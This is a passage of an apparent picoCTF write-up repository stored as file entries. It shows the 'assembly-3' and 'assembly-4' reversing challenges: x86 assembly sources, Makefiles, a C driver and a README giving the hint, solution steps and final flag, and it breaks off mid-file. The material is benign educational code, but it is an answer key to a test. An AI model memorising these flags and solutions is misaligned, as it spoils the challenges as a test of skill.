"Reversing/assembly-3/files/end_asm_rev.S", "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm3\n\nasm3:\n\tpush \tebp\n\tmov \tebp,esp\n\tmov\teax,0xbc\n\txor\tal,al\n\tmov\tah,BYTE PTR [ebp+0x9]\n\tsal\tax,0x10\n\tsub\tal,BYTE PTR [ebp+0xc]\n\tadd\tah,BYTE PTR [ebp+0xd]\n\txor\tax,WORD PTR [ebp+0x10]\n\tmov\tesp, ebp\n\tpop\tebp\n\tret\n" }, { "path": "Reversing/assembly-3/solution/Makefile", "content": "all:\n\tgcc -m32 -c end.s -o end.o\n\tgcc -m32 -c solve.c -o solve.o\n\tgcc -m32 -o a.out solve.o end.o\n\t./a.out\nclean:\n\trm a.out *.o\n" }, { "path": "Reversing/assembly-3/solution/end.s", "content": ".intel_syntax noprefix\n\t\n.global asm3\n\nasm3:\n\tpush \tebp\n\tmov \tebp,esp\n\tmov\teax,0xbc\n\txor\tal,al\n\tmov\tah,BYTE PTR [ebp+0x9]\n\tsal\tax,0x10\n\tsub\tal,BYTE PTR [ebp+0xc]\n\tadd\tah,BYTE PTR [ebp+0xd]\n\txor\tax,WORD PTR [ebp+0x10]\n\tmov\tesp, ebp\n\tpop\tebp\n\tret\n" }, { "path": "Reversing/assembly-3/solution/solve.c", "content": "#include \n\nint main() {\n printf(\"Flag: 0x%x\\n\", asm3(0xbda42100, 0xb98dd6a5, 0xecded223));\n}\n" }, { "path": "Reversing/assembly-3/solution/solve.sh", "content": "#!/bin/sh\nmake all\n" }, { "path": "Reversing/assembly-4/README.md", "content": "# assembly-4\nPoints: 550\n\n## Category\nReversing\n\n## Question\n>Can you find the flag using the following assembly [source](files/comp.nasm)? WARNING: It is VERY long... \n\n### Hint\n>Hmm.. There must be an easier way than reversing the whole thing right?\n\n## Solution\nCompile the code using _nasm_ and _gcc_. Run executable and get the flag.\n\nNote: The flag outputted is `picoCTF{1_h0p3_70u_c0mP1l3d_tH15_2390040222}`, however this doesn't work on the server. Refer to https://piazza.com/class/jkimphnvxey1qo?cid=65 to get the real flag\n\nWorking solution [solve.sh](solution/solve.sh)\n\n### Flag\n`picoCTF{1_h0p3_y0u_c0mP1l3d_tH15_2350040222}`\n" }, { "path": "Reversing/assembly-4/files/Makefile", "content": "all:\n\tnasm -f elf32 comp.nasm\n\tgcc -m32 comp.o\n\t./a.out\nclean:\n\trm a.out comp.o\n" }, { "path": "Reversing/assembly-4/files/comp.nasm", "content": "\n\n\n\n\n\n\nglobal rrf0\nglobal rrf1\nglobal rrf2\nglobal rrf3\nglobal rrf4\nglobal rrf5\nglobal rrf6\nglobal rrf7\nglobal rrf8\nglobal rrf9\nglobal rrfcl\nglobal rrfscl\nglobal rrflt\nglobal rrfeq\nglobal rrfgt\nglobal rrfqm\nglobal rrfat\nglobal rrfA\nglobal rrfB\nglobal rrfC\nglobal rrfD\nglobal rrfE\nglobal rrfF\nglobal rrfG\nglobal rrfH\nglobal rrfI\nglobal rrfJ\nglobal rrfK\nglobal rrfL\nglobal rrfM\nglobal rrfN\nglobal rrfO\nglobal rrfP\nglobal rrfQ\nglobal rrfR\nglobal rrfS\nglobal rrfT\nglobal rrfU\nglobal rrfV\nglobal rrfW\nglobal rrfX\nglobal rrfY\nglobal rrfZ\nglobal rrflb\nglobal rrfbs\nglobal rrfrb\nglobal rrfct\nglobal rrfus\nglobal rrftl\nglobal rrfa\nglobal rrfb\nglobal rrfc\nglobal rrfd\nglobal rrfe\nglobal rrff\nglobal rrfg\nglobal rrfh\nglobal rrfi\nglobal rrfj\nglobal rrfk\nglobal rrfl\nglobal rrfm\nglobal rrfn\nglobal rrfo\nglobal rrfp\nglobal rrfq\nglobal rrfr\nglobal rrfs\nglobal rrft\nglobal rrfu\nglobal rrfv\nglobal rrfw\nglobal rrfx\nglobal rrfy\nglobal rrfz\nglobal rrflcb\nglobal rrfst\nglobal rrfrcb\nglobal rrf00\nglobal add\nglobal sub\nglobal xor\nglobal main\n\nextern write\n\n\nSECTION .text \n\nrrf0:\n mov eax, 48\n ret\n\n\nrrf1:\n mov eax, 49\n ret\n\n\nrrf2:\n mov eax, 50\n ret\n\n\nrrf3:\n mov eax, 51\n ret\n\n\nrrf4:\n mov eax, 52\n ret\n\n\nrrf5:\n mov eax, 53\n ret\n\n\nrrf6:\n mov eax, 54\n ret\n\n\nrrf7:\n mov eax, 55\n ret\n\n\nrrf8:\n mov eax, 56\n ret\n\n\nrrf9:\n mov eax, 57\n ret\n\n\nrrfcl:\n mov eax, 58\n ret\n\n\nrrfscl:\n mov eax, 59\n ret\n\n\nrrflt:\n mov eax, 60\n ret\n\n\nrrfeq:\n mov eax, 61\n ret\n\n\nrrfgt:\n mov eax, 62\n ret\n\n\nrrfqm:\n mov eax, 63\n ret\n\n\nrrfat:\n mov eax, 64\n ret\n\n\nrrfA:\n mov eax, 65\n ret\n\n\nrrfB:\n mov eax, 66\n ret\n\n\nrrfC:\n mov eax, 67\n ret\n\n\nrrfD:\n mov eax, 68\n ret\n\n\nrrfE:\n mov eax, 69\n ret\n\n\nrrfF:\n mov eax, 70\n ret\n\n\nrrfG:\n mov eax, 71\n ret\n\n\nrrfH:\n mov eax, 72\n ret\n\n\nrrfI:\n mov eax, 73\n ret\n\n\nrrfJ:\n mov eax, 74\n ret\n\n\nrrfK:\n mov eax, 75\n ret\n\n\nrrfL:\n mov eax, 76\n ret\n\n\nrrfM:\n mov eax, 77\n ret\n\n\nrrfN:\n mov eax, 78\n ret\n\n\nrrfO:\n mov eax, 79\n ret\n\n\nrrfP:\n mov eax, 80\n ret\n\n\nrrfQ:\n mov eax, 81\n ret\n\n\nrrfR:\n mov eax, 82\n ret\n\n\nrrfS:\n mov eax, 83\n ret\n\n\nrrfT:\n mov eax, 84\n ret\n\n\nrrfU:\n mov eax, 85\n ret\n\n\nrrfV:\n mov eax, 86\n ret\n\n\nrrfW:\n mov eax, 87\n ret\n\n\nrrfX:\n mov eax, 88\n ret\n\n\nrrfY:\n mov eax, 89\n ret\n\n\nrrfZ:\n mov eax, 90\n ret\n\n\nrrflb:\n mov eax, 91\n ret\n\n\nrrfbs:\n mov eax, 92\n ret\n\n\nrrfrb:\n mov eax, 93\n ret\n\n\nrrfct:\n mov eax, 94\n ret\n\n\nrrfus:\n mov eax, 95\n ret\n\n\nrrftl:\n mov eax, 96\n ret\n\n\nrrfa:\n mov eax, 97\n ret\n\n\nrrfb:\n mov eax, 98\n ret\n\n\nrrfc:\n mov eax, 99\n ret\n\n\nrrfd:\n mov eax, 100\n ret\n\n\nrrfe:\n mov eax, 101\n ret\n\n\nrrff:\n mov eax, 102\n ret\n\n\nrrfg:\n mov eax, 103\n ret\n\n\nrrfh:\n mov eax, 104\n ret\n\n\nrrfi:\n mov eax, 105\n ret\n\n\nrrfj:\n mov eax, 106\n ret\n\n\nrrfk:\n mov eax, 107\n ret\n\n\nrrfl:\n mov eax, 108\n ret\n\n\nrrfm:\n mov eax, 109\n ret\n\n\nrrfn:\n mov eax, 110\n ret\n\n\nrrfo:\n mov eax, 111\n ret\n\n\nrrfp:\n mov eax, 112\n ret\n\n\nrrfq:\n mov eax, 113\n ret\n\n\nrrfr:\n mov eax, 114\n ret\n\n\nrrfs:\n mov eax, 115\n ret\n\n\nrrft:\n mov eax, 116\n ret\n\n\nrrfu:\n mov eax, 117\n ret\n\n\nrrfv:\n mov eax, 118\n ret\n\n\nrrfw:\n mov eax, 119\n ret\n\n\nrrfx:\n mov eax, 120\n ret\n\n\nrrfy:\n mov eax, 121\n ret\n\n\nrrfz:\n mov eax, 122\n ret\n\n\nrrflcb:\n mov eax, 123\n ret\n\n\nrrfst:\n mov eax, 124\n ret\n\n\nrrfrcb:\n mov eax, 125\n ret\n\n\nrrf00:\n mov eax, 0\n ret\n\n\nadd:\n movsx ecx, byte [esp+4H]\n sub ecx, 48\n add ecx, dword [esp+8H]\n mov edx, 3524075731\n mov eax, ecx\n imul edx\n add edx, ecx\n sar edx, 6\n mov eax, ecx\n sar eax, 31\n sub edx, eax\n imul edx, edx, 78\n sub ecx, edx\n lea eax, [ecx+30H]\n ret\n\n\nsub:\n movsx ecx, byte [esp+4H]\n sub ecx, 48\n sub ecx, dword [esp+8H]\n mov edx, 3524075731\n mov eax, ecx\n imul edx\n add edx, ecx\n sar edx, 6\n mov eax, ecx\n sar eax, 31\n sub edx, eax\n imul edx, edx, 78\n sub ecx, edx\n mov edx, ecx\n lea ecx, [ecx+7EH]\n lea eax, [edx+30H]\n test edx, edx\n cmovs eax, ecx\n ret\n\n\nxor:\n movsx ecx, byte [esp+4H]\n sub ecx, 48\n mov eax, dword [esp+8H]\n and eax, 07H\n xor ecx, eax\n mov edx, 3524075731\n mov eax, ecx\n imul edx\n add edx, ecx\n sar edx, 6\n mov eax, ecx\n sar eax, 31\n sub edx, eax\n imul edx, edx, 78\n sub ecx, edx\n lea eax, [ecx+30H]\n ret\n\n\nmain:\n lea ecx, [esp+4H]\n and esp, 0FFFFFFF0H\n push dword [ecx-4H]\n push ebp\n mov ebp, esp\n push esi\n push ebx\n push ecx\n sub esp, 60\n push 39\n push 73\n call sub\n add esp, 8\n mov byte [ebp-44H], al\n push 48\n push 99\n call sub\n add esp, 8\n push 24\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-42H], al\n push 44\n push 68\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 05H\n mov ebx, 3524075731\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-40H], cl\n push 41\n push 121\n call sub\n add esp, 8\n push 47\n movsx eax, al\n push eax\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-3EH], cl\n push 31\n push 54\n call sub\n add esp, 8\n push 34\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-3CH], al\n push 54\n push 55\n call sub\n add esp, 8\n push 49\n movsx ecx, al\n add ecx, 6\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n lea eax, [ecx+30H]\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-3AH], al\n push 40\n push 108\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 02H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-38H], cl\n mov byte [ebp-36H], 123\n push 50\n push 99\n call sub\n add esp, 8\n mov byte [ebp-34H], al\n mov byte [ebp-32H], 95\n push 32\n push 102\n call sub\n add esp, 8\n push 22\n movsx eax, al\n push eax\n call sub\n add esp, 8\n movsx ecx, al\n add ecx, 8\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-30H], cl\n push 20\n push 107\n call sub\n add esp, 8\n push 39\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-2EH], al\n push 46\n push 80\n call sub\n add esp, 8\n mov byte [ebp-2CH], al\n push 27\n push 78\n call sub\n add esp, 8\n mov byte [ebp-2AH], al\n push 28\n push 123\n call sub\n add esp, 8\n mov byte [ebp-28H], al\n mov byte [ebp-26H], 55\n push 36\n push 84\n call sub\n add esp, 8\n mov byte [ebp-24H], al\n push 33\n push 107\n call sub\n add esp, 8\n push 39\n movsx ecx, al\n sub ecx, 48\n xor ecx, 04H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n lea eax, [ecx+30H]\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-22H], al\n push 49\n push 66\n call sub\n add esp, 8\n mov byte [ebp-20H], al\n mov byte [ebp-1EH], 99\n push 36\n push 57\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 07H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n movsx ecx, cl\n sub ecx, 22\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-1CH], cl\n mov byte [ebp-1AH], 109\n mov byte [ebp-43H], 80\n push 18\n push 67\n call sub\n add esp, 8\n mov byte [ebp-41H], al\n push 32\n push 112\n call sub\n add esp, 8\n push 25\n movsx eax, al\n lea ecx, [eax+5H]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-3FH], al\n push 37\n push 109\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 06H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n movsx ecx, cl\n add ecx, 3\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-3DH], cl\n push 31\n push 49\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 04H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-3BH], cl\n push 23\n push 118\n call sub\n add esp, 8\n mov byte [ebp-39H], al\n push 43\n push 81\n call sub\n add esp, 8\n mov byte [ebp-37H], al\n push 34\n push 61\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 03H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n movsx ecx, cl\n sub ecx, 4\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-35H], cl\n push 51\n push 100\n call sub\n add esp, 8\n mov byte [ebp-33H], al\n push 27\n push 80\n call sub\n add esp, 8\n mov byte [ebp-31H], al\n mov byte [ebp-2FH], 95\n push 40\n push 110\n call sub\n add esp, 8\n push 42\n movsx eax, al\n push eax\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 26\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-2DH], cl\n push 43\n push 94\n call sub\n add esp, 8\n movsx eax, al\n lea ecx, [eax-30H]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n movsx eax, al\n lea ecx, [eax-30H]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n mov byte [ebp-2BH], al\n push 22\n push 79\n call sub\n add esp, 8\n mov byte [ebp-29H], al\n push 20\n push 104\n call sub\n add esp, 8\n movsx eax, al\n lea ecx, [eax-1EH]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n movsx eax, al\n lea ecx, [eax-18H]\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n mov eax, ecx\n add eax, 48\n mov byte [ebp-27H], al\n push 24\n push 48\n call sub\n add esp, 8\n push 54\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-25H], al\n push 50\n push 70\n call sub\n add esp, 8\n push 20\n movsx eax, al\n push eax\n call sub\n add esp, 8\n movsx ecx, al\n add ecx, 4\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-23H], cl\n push 26\n push 74\n call sub\n add esp, 8\n mov byte [ebp-21H], al\n push 45\n push 52\n call sub\n add esp, 8\n push 35\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-1FH], al\n push 51\n push 70\n call sub\n add esp, 8\n push 47\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-1DH], al\n push 41\n push 91\n call sub\n add esp, 8\n mov byte [ebp-1BH], al\n push 34\n push 93\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 21\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n movsx ecx, cl\n sub ecx, 9\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-19H], cl\n lea ebx, [ebp-44H]\n lea esi, [ebp-18H]\nL_001: sub esp, 4\n push 1\n push ebx\n push 1\n call write\n add ebx, 2\n add esp, 16\n cmp ebx, esi\n jnz L_001\n lea ebx, [ebp-43H]\n lea esi, [ebp-17H]\nL_002: sub esp, 4\n push 1\n push ebx\n push 1\n call write\n add ebx, 2\n add esp, 16\n cmp esi, ebx\n jnz L_002\n mov eax, 0\n lea esp, [ebp-0CH]\n pop ecx\n pop ebx\n pop esi\n pop ebp\n lea esp, [ecx-4H]\n ret\n" }, { "path": "Reversing/assembly-4/solution/Makefile", "content": "all:\n\tnasm -f elf32 comp.nasm\n\tgcc -m32 comp.o\n\t./a.out\nclean:\n\trm a.out comp.o\n" }, { "path": "Reversing/assembly-4/solution/comp.nasm", "content": "\n\n\n\n\n\n\nglobal rrf0\nglobal rrf1\nglobal rrf2\nglobal rrf3\nglobal rrf4\nglobal rrf5\nglobal rrf6\nglobal rrf7\nglobal rrf8\nglobal rrf9\nglobal rrfcl\nglobal rrfscl\nglobal rrflt\nglobal rrfeq\nglobal rrfgt\nglobal rrfqm\nglobal rrfat\nglobal rrfA\nglobal rrfB\nglobal rrfC\nglobal rrfD\nglobal rrfE\nglobal rrfF\nglobal rrfG\nglobal rrfH\nglobal rrfI\nglobal rrfJ\nglobal rrfK\nglobal rrfL\nglobal rrfM\nglobal rrfN\nglobal rrfO\nglobal rrfP\nglobal rrfQ\nglobal rrfR\nglobal rrfS\nglobal rrfT\nglobal rrfU\nglobal rrfV\nglobal rrfW\nglobal rrfX\nglobal rrfY\nglobal rrfZ\nglobal rrflb\nglobal rrfbs\nglobal rrfrb\nglobal rrfct\nglobal rrfus\nglobal rrftl\nglobal rrfa\nglobal rrfb\nglobal rrfc\nglobal rrfd\nglobal rrfe\nglobal rrff\nglobal rrfg\nglobal rrfh\nglobal rrfi\nglobal rrfj\nglobal rrfk\nglobal rrfl\nglobal rrfm\nglobal rrfn\nglobal rrfo\nglobal rrfp\nglobal rrfq\nglobal rrfr\nglobal rrfs\nglobal rrft\nglobal rrfu\nglobal rrfv\nglobal rrfw\nglobal rrfx\nglobal rrfy\nglobal rrfz\nglobal rrflcb\nglobal rrfst\nglobal rrfrcb\nglobal rrf00\nglobal add\nglobal sub\nglobal xor\nglobal main\n\nextern write\n\n\nSECTION .text \n\nrrf0:\n mov eax, 48\n ret\n\n\nrrf1:\n mov eax, 49\n ret\n\n\nrrf2:\n mov eax, 50\n ret\n\n\nrrf3:\n mov eax, 51\n ret\n\n\nrrf4:\n mov eax, 52\n ret\n\n\nrrf5:\n mov eax, 53\n ret\n\n\nrrf6:\n mov eax, 54\n ret\n\n\nrrf7:\n mov eax, 55\n ret\n\n\nrrf8:\n mov eax, 56\n ret\n\n\nrrf9:\n mov eax, 57\n ret\n\n\nrrfcl:\n mov eax, 58\n ret\n\n\nrrfscl:\n mov eax, 59\n ret\n\n\nrrflt:\n mov eax, 60\n ret\n\n\nrrfeq:\n mov eax, 61\n ret\n\n\nrrfgt:\n mov eax, 62\n ret\n\n\nrrfqm:\n mov eax, 63\n ret\n\n\nrrfat:\n mov eax, 64\n ret\n\n\nrrfA:\n mov eax, 65\n ret\n\n\nrrfB:\n mov eax, 66\n ret\n\n\nrrfC:\n mov eax, 67\n ret\n\n\nrrfD:\n mov eax, 68\n ret\n\n\nrrfE:\n mov eax, 69\n ret\n\n\nrrfF:\n mov eax, 70\n ret\n\n\nrrfG:\n mov eax, 71\n ret\n\n\nrrfH:\n mov eax, 72\n ret\n\n\nrrfI:\n mov eax, 73\n ret\n\n\nrrfJ:\n mov eax, 74\n ret\n\n\nrrfK:\n mov eax, 75\n ret\n\n\nrrfL:\n mov eax, 76\n ret\n\n\nrrfM:\n mov eax, 77\n ret\n\n\nrrfN:\n mov eax, 78\n ret\n\n\nrrfO:\n mov eax, 79\n ret\n\n\nrrfP:\n mov eax, 80\n ret\n\n\nrrfQ:\n mov eax, 81\n ret\n\n\nrrfR:\n mov eax, 82\n ret\n\n\nrrfS:\n mov eax, 83\n ret\n\n\nrrfT:\n mov eax, 84\n ret\n\n\nrrfU:\n mov eax, 85\n ret\n\n\nrrfV:\n mov eax, 86\n ret\n\n\nrrfW:\n mov eax, 87\n ret\n\n\nrrfX:\n mov eax, 88\n ret\n\n\nrrfY:\n mov eax, 89\n ret\n\n\nrrfZ:\n mov eax, 90\n ret\n\n\nrrflb:\n mov eax, 91\n ret\n\n\nrrfbs:\n mov eax, 92\n ret\n\n\nrrfrb:\n mov eax, 93\n ret\n\n\nrrfct:\n mov eax, 94\n ret\n\n\nrrfus:\n mov eax, 95\n ret\n\n\nrrftl:\n mov eax, 96\n ret\n\n\nrrfa:\n mov eax, 97\n ret\n\n\nrrfb:\n mov eax, 98\n ret\n\n\nrrfc:\n mov eax, 99\n ret\n\n\nrrfd:\n mov eax, 100\n ret\n\n\nrrfe:\n mov eax, 101\n ret\n\n\nrrff:\n mov eax, 102\n ret\n\n\nrrfg:\n mov eax, 103\n ret\n\n\nrrfh:\n mov eax, 104\n ret\n\n\nrrfi:\n mov eax, 105\n ret\n\n\nrrfj:\n mov eax, 106\n ret\n\n\nrrfk:\n mov eax, 107\n ret\n\n\nrrfl:\n mov eax, 108\n ret\n\n\nrrfm:\n mov eax, 109\n ret\n\n\nrrfn:\n mov eax, 110\n ret\n\n\nrrfo:\n mov eax, 111\n ret\n\n\nrrfp:\n mov eax, 112\n ret\n\n\nrrfq:\n mov eax, 113\n ret\n\n\nrrfr:\n mov eax, 114\n ret\n\n\nrrfs:\n mov eax, 115\n ret\n\n\nrrft:\n mov eax, 116\n ret\n\n\nrrfu:\n mov eax, 117\n ret\n\n\nrrfv:\n mov eax, 118\n ret\n\n\nrrfw:\n mov eax, 119\n ret\n\n\nrrfx:\n mov eax, 120\n ret\n\n\nrrfy:\n mov eax, 121\n ret\n\n\nrrfz:\n mov eax, 122\n ret\n\n\nrrflcb:\n mov eax, 123\n ret\n\n\nrrfst:\n mov eax, 124\n ret\n\n\nrrfrcb:\n mov eax, 125\n ret\n\n\nrrf00:\n mov eax, 0\n ret\n\n\nadd:\n movsx ecx, byte [esp+4H]\n sub ecx, 48\n add ecx, dword [esp+8H]\n mov edx, 3524075731\n mov eax, ecx\n imul edx\n add edx, ecx\n sar edx, 6\n mov eax, ecx\n sar eax, 31\n sub edx, eax\n imul edx, edx, 78\n sub ecx, edx\n lea eax, [ecx+30H]\n ret\n\n\nsub:\n movsx ecx, byte [esp+4H]\n sub ecx, 48\n sub ecx, dword [esp+8H]\n mov edx, 3524075731\n mov eax, ecx\n imul edx\n add edx, ecx\n sar edx, 6\n mov eax, ecx\n sar eax, 31\n sub edx, eax\n imul edx, edx, 78\n sub ecx, edx\n mov edx, ecx\n lea ecx, [ecx+7EH]\n lea eax, [edx+30H]\n test edx, edx\n cmovs eax, ecx\n ret\n\n\nxor:\n movsx ecx, byte [esp+4H]\n sub ecx, 48\n mov eax, dword [esp+8H]\n and eax, 07H\n xor ecx, eax\n mov edx, 3524075731\n mov eax, ecx\n imul edx\n add edx, ecx\n sar edx, 6\n mov eax, ecx\n sar eax, 31\n sub edx, eax\n imul edx, edx, 78\n sub ecx, edx\n lea eax, [ecx+30H]\n ret\n\n\nmain:\n lea ecx, [esp+4H]\n and esp, 0FFFFFFF0H\n push dword [ecx-4H]\n push ebp\n mov ebp, esp\n push esi\n push ebx\n push ecx\n sub esp, 60\n push 39\n push 73\n call sub\n add esp, 8\n mov byte [ebp-44H], al\n push 48\n push 99\n call sub\n add esp, 8\n push 24\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-42H], al\n push 44\n push 68\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 05H\n mov ebx, 3524075731\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-40H], cl\n push 41\n push 121\n call sub\n add esp, 8\n push 47\n movsx eax, al\n push eax\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-3EH], cl\n push 31\n push 54\n call sub\n add esp, 8\n push 34\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-3CH], al\n push 54\n push 55\n call sub\n add esp, 8\n push 49\n movsx ecx, al\n add ecx, 6\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n lea eax, [ecx+30H]\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-3AH], al\n push 40\n push 108\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 02H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-38H], cl\n mov byte [ebp-36H], 123\n push 50\n push 99\n call sub\n add esp, 8\n mov byte [ebp-34H], al\n mov byte [ebp-32H], 95\n push 32\n push 102\n call sub\n add esp, 8\n push 22\n movsx eax, al\n push eax\n call sub\n add esp, 8\n movsx ecx, al\n add ecx, 8\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n mov byte [ebp-30H], cl\n push 20\n push 107\n call sub\n add esp, 8\n push 39\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-2EH], al\n push 46\n push 80\n call sub\n add esp, 8\n mov byte [ebp-2CH], al\n push 27\n push 78\n call sub\n add esp, 8\n mov byte [ebp-2AH], al\n push 28\n push 123\n call sub\n add esp, 8\n mov byte [ebp-28H], al\n mov byte [ebp-26H], 55\n push 36\n push 84\n call sub\n add esp, 8\n mov byte [ebp-24H], al\n push 33\n push 107\n call sub\n add esp, 8\n push 39\n movsx ecx, al\n sub ecx, 48\n xor ecx, 04H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n lea eax, [ecx+30H]\n movsx eax, al\n push eax\n call sub\n add esp, 8\n mov byte [ebp-22H], al\n push 49\n push 66\n call sub\n add esp, 8\n mov byte [ebp-20H], al\n mov byte [ebp-1EH], 99\n push 36\n push 57\n call sub\n add esp, 8\n movsx ecx, al\n sub ecx, 48\n xor ecx, 07H\n mov eax, ecx\n imul ebx\n lea eax, [edx+ecx]\n sar eax, 6\n mov edx, ecx\n sar edx, 31\n sub eax, edx\n imul eax, eax, 78\n sub ecx, eax\n add ecx, 48\n movsx ecx, cl\n sub ecx, 22\n mov eax, ecx\n imul 